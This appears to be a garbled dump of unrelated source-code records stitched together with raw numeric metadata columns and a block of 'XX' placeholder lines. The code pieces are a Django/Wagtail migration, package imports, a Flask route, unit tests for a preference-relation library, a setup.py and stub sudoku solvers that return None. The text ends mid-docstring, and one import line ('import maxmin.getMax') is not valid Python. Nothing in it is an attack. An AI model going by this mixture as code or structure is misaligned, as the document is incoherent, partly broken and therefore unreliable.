XX XXXXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXX XXXXXX XXXXXXX
XX XXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXX XXXXXX XXXX
XX XXXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXX XXXXXX XXXXX
XX XXXXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXX XXXXXX
XX XXXXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXXXX XXXXXX XXXXX
XX XXXXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXX XXXXXX XXXXX
XX XXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXX XXXXXX XX
XX XXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXX XXXXXX XX
XX XXXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXXXX XXXXXX XXXXX
XX XXXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXX XXXXXX XXXXX
XX XXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXXXX XXXXXX XXX
XX XXXXX XXXXXXXXX XXXXXXX XX XXXXX XXX XXXXXX
XX XXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXX XXXXXX
XX XXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXX XXXXXX XXX
XX XXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXXXX XXXXXX XX
XX XXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXX XXXXXX XX
XX XXXXX XXXXXXXXX XXXXXXX XX XXXXX XX XXXXXX
XX XXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXXXX XXXXXX XXX
XX XXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXX XXXXXX XXX
XX XXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXX XXXXXX XXX
XX XXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXX XXXXXX
XX XXXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXXXX XXXXXX XXXXX
XX XXXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXX XXXXXX XXXXX
XX XXXXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXX XXXXXX XXXXX XXXXX
XX XXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXX XXXXXX XXX
XX XXXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXXXX XXXXXX XXXXX
XX XXXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXX XXXXXX XXXXX
XX XXXXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXX XXXXXX XXXXX
XX XXXXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXX XXXXXX
XX XXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXXXX XXXX XXXX XXXXXX
XX XXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXX XXXXXX XXXXXXX
XX XXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXXXX XXXXXX XX
XX XXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXX XXXXXX XX
XX XXXXXX XXXXXXXXX XXXXXXX XX XXXXX XXXXX XXXXXX XXXX
| 54.339623
| 63
| 0.815972
| 437
| 2,880
| 5.377574
| 0.025172
| 0.16383
| 0.28
| 0.450213
| 0.901277
| 0.898298
| 0.877447
| 0.862979
| 0.816596
| 0.756596
| 0
| 0
| 0.184028
| 2,880
| 52
| 64
| 55.384615
| 1
| 0
| 0
| 0.901961
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
6e0e391d778e3aeca11fa6add1f2210b172fbfa9
| 3,466
|
py
|
Python
|
application/migrations/0046_auto_20201014_1400.py
|
City-of-Helsinki/events-helsinki-cms
|
64e4c1ce6cc058fb3783e417560dc244bd753d05
|
[
"MIT"
] | 2
|
2020-04-20T05:37:28.000Z
|
2021-02-19T10:33:45.000Z
|
application/migrations/0046_auto_20201014_1400.py
|
City-of-Helsinki/events-helsinki-cms
|
64e4c1ce6cc058fb3783e417560dc244bd753d05
|
[
"MIT"
] | 6
|
2020-02-12T12:55:37.000Z
|
2021-03-30T12:56:28.000Z
|
application/migrations/0046_auto_20201014_1400.py
|
City-of-Helsinki/events-helsinki-cms
|
64e4c1ce6cc058fb3783e417560dc244bd753d05
|
[
"MIT"
] | 1
|
2021-02-18T12:11:18.000Z
|
2021-02-18T12:11:18.000Z
|
# Generated by Django 2.2.9 on 2020-10-14 14:00
from django.db import migrations
import wagtail.core.blocks
import wagtail.core.fields
class Migration(migrations.Migration):
    """Add translated ``keywords_*`` StreamFields to four page models."""

    dependencies = [
        ('application', '0045_auto_20200924_0921'),
    ]

    # Every AddField is identical apart from the model name and language
    # suffix, so the operations list is generated from the cross product
    # (same order as the original hand-written list: model-major, then
    # en/fi/sv within each model).
    operations = [
        migrations.AddField(
            model_name=model,
            name='keywords_{}'.format(code),
            field=wagtail.core.fields.StreamField(
                [('keywords_{}'.format(code), wagtail.core.blocks.CharBlock())],
                blank=True,
                null=True,
                verbose_name='keywords {}'.format(code.upper()),
            ),
        )
        for model in ('aboutpage', 'accessibilitypage', 'collections', 'landingpages')
        for code in ('en', 'fi', 'sv')
    ]
| 45.605263
| 153
| 0.625505
| 360
| 3,466
| 5.880556
| 0.125
| 0.135097
| 0.104393
| 0.153047
| 0.908361
| 0.908361
| 0.908361
| 0.826169
| 0.826169
| 0.826169
| 0
| 0.011632
| 0.231102
| 3,466
| 75
| 154
| 46.213333
| 0.782739
| 0.012983
| 0
| 0.869565
| 1
| 0
| 0.168763
| 0.006727
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.043478
| 0
| 0.086957
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
2811c576c56ceab1a86517999c7e291553462fd2
| 78
|
py
|
Python
|
binary/serializers/__init__.py
|
tomgrin10/binary-core
|
12d27663b94daa3f50bd1fa4b652dde441db7609
|
[
"MIT"
] | 1
|
2020-08-15T17:05:04.000Z
|
2020-08-15T17:05:04.000Z
|
binary/serializers/__init__.py
|
tomgrin10/binary-core
|
12d27663b94daa3f50bd1fa4b652dde441db7609
|
[
"MIT"
] | 1
|
2020-04-30T00:02:19.000Z
|
2020-04-30T00:08:21.000Z
|
binary/serializers/__init__.py
|
tomgrin10/binary-core
|
12d27663b94daa3f50bd1fa4b652dde441db7609
|
[
"MIT"
] | null | null | null |
from binary.serializers.base import *
from binary.serializers.ctypes import *
| 26
| 39
| 0.820513
| 10
| 78
| 6.4
| 0.6
| 0.3125
| 0.65625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102564
| 78
| 2
| 40
| 39
| 0.914286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
284af86794755bad978b8216c26b046d5b72800e
| 150
|
py
|
Python
|
app/routes.py
|
waqas4afzal/jaami_e8051
|
786d0f282d7b835f6e23b7015e588e70bd2b1c1f
|
[
"MIT"
] | null | null | null |
app/routes.py
|
waqas4afzal/jaami_e8051
|
786d0f282d7b835f6e23b7015e588e70bd2b1c1f
|
[
"MIT"
] | null | null | null |
app/routes.py
|
waqas4afzal/jaami_e8051
|
786d0f282d7b835f6e23b7015e588e70bd2b1c1f
|
[
"MIT"
] | null | null | null |
from flask import render_template
from app import app
@app.route('/')
@app.route('/index')
def index():
    """Render the landing page (template name is in Urdu)."""
    return render_template('صفحہ_جامع.html')
| 18.75
| 44
| 0.726667
| 22
| 150
| 4.818182
| 0.590909
| 0.264151
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.126667
| 150
| 8
| 44
| 18.75
| 0.80916
| 0
| 0
| 0
| 0
| 0
| 0.139073
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| true
| 0
| 0.333333
| 0.166667
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
28740823563efca62e67667b1ad1f848c2da4d32
| 106
|
py
|
Python
|
hmlf/algorithms/ssac/__init__.py
|
lorenzob123/HMLF
|
3577c61b8f2bae7959de81dfd3981c3a8e26d8b6
|
[
"MIT"
] | 1
|
2021-05-05T05:59:55.000Z
|
2021-05-05T05:59:55.000Z
|
hmlf/algorithms/ssac/__init__.py
|
lorenzob123/HMLF
|
3577c61b8f2bae7959de81dfd3981c3a8e26d8b6
|
[
"MIT"
] | 1
|
2021-05-18T07:51:46.000Z
|
2021-05-18T07:51:46.000Z
|
hmlf/algorithms/ssac/__init__.py
|
lorenzob123/HMLF
|
3577c61b8f2bae7959de81dfd3981c3a8e26d8b6
|
[
"MIT"
] | null | null | null |
from hmlf.algorithms.ssac.policies import CnnPolicy, MlpPolicy
from hmlf.algorithms.ssac.ssac import SSAC
| 35.333333
| 62
| 0.849057
| 15
| 106
| 6
| 0.533333
| 0.177778
| 0.4
| 0.488889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.084906
| 106
| 2
| 63
| 53
| 0.927835
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
955edaa5b4c9a9f4ff20167ee3cc2244db8cd5f8
| 11,395
|
py
|
Python
|
tests/test_preference_relation.py
|
jakub-tomczak/ror
|
cf9ab38a2d66f4816a1289b9726911960059fce7
|
[
"MIT"
] | null | null | null |
tests/test_preference_relation.py
|
jakub-tomczak/ror
|
cf9ab38a2d66f4816a1289b9726911960059fce7
|
[
"MIT"
] | null | null | null |
tests/test_preference_relation.py
|
jakub-tomczak/ror
|
cf9ab38a2d66f4816a1289b9726911960059fce7
|
[
"MIT"
] | null | null | null |
from ror.data_loader import read_dataset_from_txt
import unittest
from ror.PreferenceRelations import PreferenceRelation
from ror.Relation import INDIFFERENCE, PREFERENCE, Relation, WEAK_PREFERENCE
class TestPreferenceRelations(unittest.TestCase):
    """Tests for PreferenceRelation.

    Covers validation of the alpha parameter and of the relation argument,
    the linear constraint produced by to_constraint() for the strong, weak
    and indifference relations at alpha = 0, 0.5 and 1, and equality /
    hashing of PreferenceRelation instances.

    NOTE(review): the expected variable names below assume the dataset in
    tests/datasets/example.txt defines a criterion named 'MaxSpeed' and
    alternatives 'b01'/'b02' -- verify against that fixture.
    """

    def test_creating_preference_invalid_alpha(self):
        """alpha must stay within [0, 1]; values just outside must raise."""
        with self.assertRaises(AssertionError):
            relation = PreferenceRelation('b01', 'b02', PREFERENCE)
            relation.alpha = -1e-10  # just below the lower bound
        with self.assertRaises(AssertionError):
            relation = PreferenceRelation('b01', 'b02', PREFERENCE)
            relation.alpha = 1+1e-10  # just above the upper bound

    def test_creating_preference_invalid_relation(self):
        """Neither a raw string nor an ad-hoc Relation object is accepted."""
        with self.assertRaises(AssertionError):
            PreferenceRelation('b01', 'b02', "<=")
        with self.assertRaises(AssertionError):
            PreferenceRelation('b01', 'b02', Relation('<='))

    def test_strong_preference_alpha_0(self):
        """Strong preference, alpha = 0: only the lambda variables carry
        non-zero coefficients and the free variable equals data.eps."""
        loading_result = read_dataset_from_txt("tests/datasets/example.txt")
        data = loading_result.dataset
        preference = PreferenceRelation('b01', 'b02', PREFERENCE)
        preference_constraint = preference.to_constraint(data, 0.0)
        self.assertEqual(preference_constraint._relation, PREFERENCE)
        # 2 * len(data.criteria) -> u_i(a_k); +2 -> lambda(a_k)
        self.assertEqual(len(preference_constraint.variables),
                         2 * len(data.criteria) + 2)
        self.assertEqual(preference_constraint._name,
                         'preference_{all}(b02) <= preference_{all}(b01)')
        self.assertTrue(
            'lambda_{all}(b01)' in preference_constraint.variables_names)
        self.assertAlmostEqual(preference_constraint.get_variable(
            'lambda_{all}(b01)').coefficient, 1.0)
        self.assertTrue(
            'u_{MaxSpeed}(b01)' in preference_constraint.variables_names)
        self.assertAlmostEqual(preference_constraint.get_variable(
            'u_{MaxSpeed}(b01)').coefficient, 0.0)
        self.assertTrue(
            'lambda_{all}(b02)' in preference_constraint.variables_names)
        self.assertAlmostEqual(preference_constraint.get_variable(
            'lambda_{all}(b02)').coefficient, -1.0)
        self.assertTrue(
            'u_{MaxSpeed}(b02)' in preference_constraint.variables_names)
        self.assertAlmostEqual(preference_constraint.get_variable(
            'u_{MaxSpeed}(b02)').coefficient, 0.0)
        self.assertAlmostEqual(
            preference_constraint.free_variable.coefficient, data.eps)

    def test_strong_preference_alpha_1(self):
        """Strong preference, alpha = 1: only the u_{criterion} variables
        carry non-zero coefficients; the free variable still equals data.eps."""
        loading_result = read_dataset_from_txt("tests/datasets/example.txt")
        data = loading_result.dataset
        alpha = 1.0
        preference = PreferenceRelation('b01', 'b02', PREFERENCE)
        preference_constraint = preference.to_constraint(data, alpha)
        self.assertEqual(preference_constraint._relation, PREFERENCE)
        # 2 * len(data.criteria) -> u_i(a_k); +2 -> lambda(a_k)
        self.assertEqual(len(preference_constraint.variables),
                         2 * len(data.criteria) + 2)
        self.assertEqual(preference_constraint._name,
                         'preference_{all}(b02) <= preference_{all}(b01)')
        self.assertTrue(
            'lambda_{all}(b01)' in preference_constraint.variables_names)
        self.assertAlmostEqual(preference_constraint.get_variable(
            'lambda_{all}(b01)').coefficient, 0.0)
        self.assertTrue(
            'u_{MaxSpeed}(b01)' in preference_constraint.variables_names)
        self.assertAlmostEqual(preference_constraint.get_variable(
            'u_{MaxSpeed}(b01)').coefficient, -1.0)
        self.assertTrue(
            'lambda_{all}(b02)' in preference_constraint.variables_names)
        self.assertAlmostEqual(preference_constraint.get_variable(
            'lambda_{all}(b02)').coefficient, 0.0)
        self.assertTrue(
            'u_{MaxSpeed}(b02)' in preference_constraint.variables_names)
        self.assertAlmostEqual(preference_constraint.get_variable(
            'u_{MaxSpeed}(b02)').coefficient, 1.0)
        self.assertAlmostEqual(
            preference_constraint.free_variable.coefficient,
            # this is just data.eps, but write how it evaluates
            data.eps - alpha * len(data.criteria) + alpha * len(data.criteria)
        )

    def test_weak_preference_alpha_1(self):
        """Weak preference, alpha = 1: same coefficients as the strong
        relation but the free variable is 0 (no epsilon term)."""
        loading_result = read_dataset_from_txt("tests/datasets/example.txt")
        data = loading_result.dataset
        alpha = 1.0
        preference = PreferenceRelation('b01', 'b02', WEAK_PREFERENCE)
        preference_constraint = preference.to_constraint(data, alpha)
        self.assertEqual(preference_constraint._relation,
                         WEAK_PREFERENCE)
        # 2 * len(data.criteria) -> u_i(a_k); +2 -> lambda(a_k)
        self.assertEqual(len(preference_constraint.variables),
                         2 * len(data.criteria) + 2)
        self.assertEqual(preference_constraint.name,
                         'weak preference_{all}(b02) <= weak preference_{all}(b01)')
        self.assertTrue(
            'lambda_{all}(b01)' in preference_constraint.variables_names)
        self.assertAlmostEqual(preference_constraint.get_variable(
            'lambda_{all}(b01)').coefficient, 0.0)
        self.assertTrue(
            'u_{MaxSpeed}(b01)' in preference_constraint.variables_names)
        self.assertAlmostEqual(preference_constraint.get_variable(
            'u_{MaxSpeed}(b01)').coefficient, -1.0)
        self.assertTrue(
            'lambda_{all}(b02)' in preference_constraint.variables_names)
        self.assertAlmostEqual(preference_constraint.get_variable(
            'lambda_{all}(b02)').coefficient, 0.0)
        self.assertTrue(
            'u_{MaxSpeed}(b02)' in preference_constraint.variables_names)
        self.assertAlmostEqual(preference_constraint.get_variable(
            'u_{MaxSpeed}(b02)').coefficient, 1.0)
        self.assertAlmostEqual(
            preference_constraint.free_variable.coefficient, 0)

    def test_strong_preference_alpha_0_5(self):
        """Strong preference, alpha = 0.5: lambda and u variables share the
        weight equally (+/-0.5); the free variable equals data.eps."""
        loading_result = read_dataset_from_txt("tests/datasets/example.txt")
        data = loading_result.dataset
        alpha = 0.5
        preference = PreferenceRelation('b01', 'b02', PREFERENCE)
        preference_constraint = preference.to_constraint(data, alpha)
        self.assertEqual(preference_constraint._relation, PREFERENCE)
        # 2 * len(data.criteria) -> u_i(a_k); +2 -> lambda(a_k)
        self.assertEqual(len(preference_constraint.variables),
                         2 * len(data.criteria) + 2)
        self.assertEqual(preference_constraint.name,
                         'preference_{all}(b02) <= preference_{all}(b01)')
        self.assertTrue(
            'lambda_{all}(b01)' in preference_constraint.variables_names)
        self.assertAlmostEqual(preference_constraint.get_variable(
            'lambda_{all}(b01)').coefficient, 0.5)
        self.assertTrue(
            'u_{MaxSpeed}(b01)' in preference_constraint.variables_names)
        self.assertAlmostEqual(preference_constraint.get_variable(
            'u_{MaxSpeed}(b01)').coefficient, -0.5)
        self.assertTrue(
            'lambda_{all}(b02)' in preference_constraint.variables_names)
        self.assertAlmostEqual(preference_constraint.get_variable(
            'lambda_{all}(b02)').coefficient, -0.5)
        self.assertTrue(
            'u_{MaxSpeed}(b02)' in preference_constraint.variables_names)
        self.assertAlmostEqual(preference_constraint.get_variable(
            'u_{MaxSpeed}(b02)').coefficient, 0.5)
        self.assertAlmostEqual(
            preference_constraint.free_variable.coefficient,
            # this is just data.eps, but write how it evaluates
            data.eps - alpha * len(data.criteria) + alpha * len(data.criteria)
        )

    def test_weak_preference_alpha_0_5(self):
        """Weak preference, alpha = 0.5: coefficients match the strong
        relation; the free variable is 0 (no epsilon term)."""
        loading_result = read_dataset_from_txt("tests/datasets/example.txt")
        data = loading_result.dataset
        alpha = 0.5
        preference = PreferenceRelation('b01', 'b02', WEAK_PREFERENCE)
        preference_constraint = preference.to_constraint(data, alpha)
        self.assertEqual(preference_constraint._relation,
                         WEAK_PREFERENCE)
        # 2 * len(data.criteria) -> u_i(a_k); +2 -> lambda(a_k)
        self.assertEqual(len(preference_constraint.variables),
                         2 * len(data.criteria) + 2)
        self.assertEqual(preference_constraint._name,
                         'weak preference_{all}(b02) <= weak preference_{all}(b01)')
        # all constraints are the same as in the strong preference, except
        # the free variable, which should be equal to 0 (no epsilon value)
        self.assertTrue(
            'lambda_{all}(b01)' in preference_constraint.variables_names)
        self.assertAlmostEqual(preference_constraint.get_variable(
            'lambda_{all}(b01)').coefficient, 0.5)
        self.assertTrue(
            'u_{MaxSpeed}(b01)' in preference_constraint.variables_names)
        self.assertAlmostEqual(preference_constraint.get_variable(
            'u_{MaxSpeed}(b01)').coefficient, -0.5)
        self.assertAlmostEqual(
            preference_constraint.free_variable.coefficient,
            # this is just 0, but write how it evaluates
            - alpha * len(data.criteria) + alpha * len(data.criteria)
        )

    def test_indifference_preference_alpha_0_5(self):
        """Indifference, alpha = 0.5: equality constraint ('==') with the
        same coefficients as the strong relation and a free variable of 0."""
        loading_result = read_dataset_from_txt("tests/datasets/example.txt")
        data = loading_result.dataset
        alpha = 0.5
        preference = PreferenceRelation('b01', 'b02', INDIFFERENCE)
        preference_constraint = preference.to_constraint(data, alpha)
        self.assertEqual(preference_constraint._relation,
                         INDIFFERENCE)
        # 2 * len(data.criteria) -> u_i(a_k); +2 -> lambda(a_k)
        self.assertEqual(len(preference_constraint.variables),
                         2 * len(data.criteria) + 2)
        self.assertEqual(preference_constraint._name,
                         'indifference_{all}(b02) == indifference_{all}(b01)')
        # all constraints are the same as in the strong preference, except
        # the free variable, which should be equal to 0 (no epsilon value)
        self.assertTrue(
            'lambda_{all}(b01)' in preference_constraint.variables_names)
        self.assertAlmostEqual(preference_constraint.get_variable(
            'lambda_{all}(b01)').coefficient, 0.5)
        self.assertTrue(
            'u_{MaxSpeed}(b01)' in preference_constraint.variables_names)
        self.assertAlmostEqual(preference_constraint.get_variable(
            'u_{MaxSpeed}(b01)').coefficient, -0.5)
        self.assertAlmostEqual(
            preference_constraint.free_variable.coefficient,
            # this is just 0, but write how it evaluates
            - alpha * len(data.criteria) + alpha * len(data.criteria)
        )

    def test_preference_relation_equals(self):
        """Relations over the same alternatives and type compare equal and
        hash equal; a different alternative breaks both."""
        preference_1 = PreferenceRelation('a1', 'a2', WEAK_PREFERENCE)
        preference_2 = PreferenceRelation('a1', 'a2', WEAK_PREFERENCE)
        preference_3 = PreferenceRelation('a1', 'a4', WEAK_PREFERENCE)
        self.assertEqual(preference_1, preference_2)
        self.assertNotEqual(preference_1, preference_3)
        self.assertEqual(preference_1.__hash__(), preference_2.__hash__())
        self.assertNotEqual(preference_1.__hash__(), preference_3.__hash__())
| 46.321138
| 88
| 0.659939
| 1,188
| 11,395
| 6.074916
| 0.078283
| 0.193986
| 0.104476
| 0.147707
| 0.921436
| 0.909658
| 0.89109
| 0.874602
| 0.865595
| 0.865595
| 0
| 0.029179
| 0.236068
| 11,395
| 245
| 89
| 46.510204
| 0.799885
| 0.05871
| 0
| 0.787565
| 0
| 0
| 0.113134
| 0.038458
| 0
| 0
| 0
| 0
| 0.373057
| 1
| 0.046632
| false
| 0
| 0.020725
| 0
| 0.072539
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
95adb0c79590e224577121b656d3880d7b3944f1
| 88
|
py
|
Python
|
Package/myfitness/summary/__init__.py
|
lizawood/Apple-Health-Fitness-Tracker
|
2129e2531a8bd4609e2fca8115ee7727da26c934
|
[
"MIT"
] | null | null | null |
Package/myfitness/summary/__init__.py
|
lizawood/Apple-Health-Fitness-Tracker
|
2129e2531a8bd4609e2fca8115ee7727da26c934
|
[
"MIT"
] | null | null | null |
Package/myfitness/summary/__init__.py
|
lizawood/Apple-Health-Fitness-Tracker
|
2129e2531a8bd4609e2fca8115ee7727da26c934
|
[
"MIT"
] | null | null | null |
# NOTE(review): the original lines read
#     from myfitness.summary import maxmin.getMax
# which is a SyntaxError -- a dotted name is not allowed after
# `from ... import`.  Import the functions from the maxmin module instead.
from myfitness.summary.maxmin import getMax, getMin
| 29.333333
| 43
| 0.863636
| 12
| 88
| 6.333333
| 0.583333
| 0.342105
| 0.526316
| 0.684211
| 0.842105
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.090909
| 88
| 2
| 44
| 44
| 0.95
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 1
| null | null | 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 8
|
c27e8b92cc53c5685397ec06d26189748c487182
| 331
|
py
|
Python
|
envs/setup.py
|
Yvette1993/spinningup
|
5094cf291fa24cf93d58b4507dab56dafe73dac1
|
[
"MIT"
] | null | null | null |
envs/setup.py
|
Yvette1993/spinningup
|
5094cf291fa24cf93d58b4507dab56dafe73dac1
|
[
"MIT"
] | null | null | null |
envs/setup.py
|
Yvette1993/spinningup
|
5094cf291fa24cf93d58b4507dab56dafe73dac1
|
[
"MIT"
] | null | null | null |
from setuptools import setup

# Package definition for the chip placement gym environment ("Secondary
# directory" layout).  An earlier 'cell_place_gym' definition and the
# 'gym' install requirement were left disabled by the original author.
setup(
    name='chip_place_gym',
    version='0.1',
)
| 30.090909
| 72
| 0.679758
| 42
| 331
| 5.214286
| 0.52381
| 0.082192
| 0.155251
| 0.237443
| 0.767123
| 0.767123
| 0.767123
| 0.767123
| 0.767123
| 0.767123
| 0
| 0.015038
| 0.196375
| 331
| 11
| 73
| 30.090909
| 0.808271
| 0.688822
| 0
| 0
| 0
| 0
| 0.180851
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.25
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c286f7ac9d40e6dc81f5ee8595a5b36af6f69f62
| 49
|
py
|
Python
|
tests/fixtures/loading/relative_2.py
|
Thom1729/yaml-macros-engine
|
f2cbdaf4d4300c842c6a6c954dceb626e3942316
|
[
"MIT"
] | null | null | null |
tests/fixtures/loading/relative_2.py
|
Thom1729/yaml-macros-engine
|
f2cbdaf4d4300c842c6a6c954dceb626e3942316
|
[
"MIT"
] | null | null | null |
tests/fixtures/loading/relative_2.py
|
Thom1729/yaml-macros-engine
|
f2cbdaf4d4300c842c6a6c954dceb626e3942316
|
[
"MIT"
] | null | null | null |
def relative_2(s):
    """Return *s* prefixed with the literal tag 'relative_2: '."""
    prefix = 'relative_2: '
    return prefix + s
| 16.333333
| 29
| 0.632653
| 8
| 49
| 3.625
| 0.625
| 0.62069
| 0.689655
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.052632
| 0.22449
| 49
| 2
| 30
| 24.5
| 0.710526
| 0
| 0
| 0
| 0
| 0
| 0.244898
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
c2acbf82214b6cbf47a7b01a0699bd91c7d3b3ea
| 3,086
|
py
|
Python
|
hw1/sudoku_core.py
|
D-denHeijer/KRR-course
|
f22dea3e68f57afceabd0402e6facbeb31b25208
|
[
"MIT"
] | 1
|
2022-01-24T15:17:53.000Z
|
2022-01-24T15:17:53.000Z
|
hw1/sudoku_core.py
|
D-denHeijer/KRR-course
|
f22dea3e68f57afceabd0402e6facbeb31b25208
|
[
"MIT"
] | 1
|
2020-06-01T12:27:52.000Z
|
2020-06-02T04:21:44.000Z
|
hw1/sudoku_core.py
|
D-denHeijer/KRR-course
|
f22dea3e68f57afceabd0402e6facbeb31b25208
|
[
"MIT"
] | 23
|
2020-06-01T09:53:23.000Z
|
2021-02-25T15:09:27.000Z
|
def propagate(sudoku_possible_values, k):
    """Constraint-propagation step of the backtracking sudoku search.

    Intended to prune candidate values from cells based on the remaining
    candidates of other cells; currently a no-op placeholder.

    Parameters:
        sudoku_possible_values (list(list(list(int)))): remaining candidate
            values for every cell of the sudoku input.
        k (int): the dimension of the sudoku input.

    Returns:
        (list(list(list(int)))): the candidate structure, unmodified.
    """
    # No propagation is performed yet -- the input is returned as-is.
    return sudoku_possible_values
def solve_sudoku_SAT(sudoku, k):
    """Solve a sudoku by encoding it into SAT and decoding a satisfying
    assignment back into a grid.

    NOTE: not implemented yet -- every input currently yields None.

    Parameters:
        sudoku (list(list(int))): the puzzle as a grid of ints; 0 marks an
            empty cell.
        k (int): the dimension of the sudoku input.

    Returns:
        (list(list(int))): the solved grid, or None when no solution exists.
    """
    return None
def solve_sudoku_CSP(sudoku, k):
    """Solve a sudoku by encoding it as a CSP and decoding a solver solution.

    NOTE: not implemented yet -- every input currently yields None.

    Parameters:
        sudoku (list(list(int))): the puzzle as a grid of ints; 0 marks an
            empty cell.
        k (int): the dimension of the sudoku input.

    Returns:
        (list(list(int))): the solved grid, or None when no solution exists.
    """
    return None
def solve_sudoku_ASP(sudoku, k):
    """Solve a sudoku by encoding it into ASP and decoding an answer set.

    NOTE: not implemented yet -- every input currently yields None.

    Parameters:
        sudoku (list(list(int))): the puzzle as a grid of ints; 0 marks an
            empty cell.
        k (int): the dimension of the sudoku input.

    Returns:
        (list(list(int))): the solved grid, or None when no solution exists.
    """
    return None
def solve_sudoku_ILP(sudoku, k):
    """Solve a sudoku by encoding it into ILP and decoding an assignment.

    NOTE: not implemented yet -- every input currently yields None.

    Parameters:
        sudoku (list(list(int))): the puzzle as a grid of ints; 0 marks an
            empty cell.
        k (int): the dimension of the sudoku input.

    Returns:
